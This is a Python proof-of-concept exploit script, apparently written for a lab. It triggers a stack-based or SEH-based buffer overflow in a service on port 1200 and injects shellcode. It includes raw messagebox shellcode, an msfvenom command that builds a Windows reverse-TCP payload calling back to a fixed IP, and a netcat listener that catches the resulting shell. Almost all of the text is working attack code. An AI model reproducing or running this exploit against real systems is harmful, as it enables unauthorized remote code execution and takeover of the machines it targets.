# Proof-of-concept exploit: triggers either a stack-based or an SEH-based buffer overflow in a
# service listening on the target's port 1200, then catches the resulting reverse shell with netcat.
import argparse
import socket
import subprocess
import time
host = '127.0.0.1' # Ip Address of the Target Machine
port = 1200 # Open port on the Server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port)) # Connecting to the Port on target machine
# Stack-Based Buffer Overflow
junk = b"A"*548 # Number of A's to send
EIP = b'\xdf\x11\x0c\x61' # JMP EIP Address
move_esp = b'\x81\xc4\xc0\xfd\xff\xff'
# Creating a reverse_tcp Shellcode using metasploit.
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.43 LPORT=4444 -b '\x00\x0a\x0d' -f c
reverse_tcp = b'<Enter Payload>'
# shellcode for displaying a messagebox.
msgbox = b"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe\x49\x0b\x31\xc0\x51\x50\xff\xd7"
# For SEH Based
junk_seh = b'A'*636 # Number of A's to send
next_seh = b'\xeb\x04\x90\x90' # 4 byte JMP Address
seh = b'\x0b\x14\x0c\x61' # Address of SEH
nops = b'\x90'*4
# To run SEH Based exploit umcomment the following SEH Based exploit and comment the Stack Based exploit.
# s.sendall(junk_seh+next_seh+seh+nops+msgbox) # SEH Base Exploit
s.sendall(junk+EIP+move_esp+reverse_tcp) # STACK-Based Exploit
s.close() # Closing Port 1200
print("The message has been sent.")
# Calling Netcat command to listen to port 4444 and get the shell of target machine.
from subprocess import call
call(["nc","-lvp","4444"])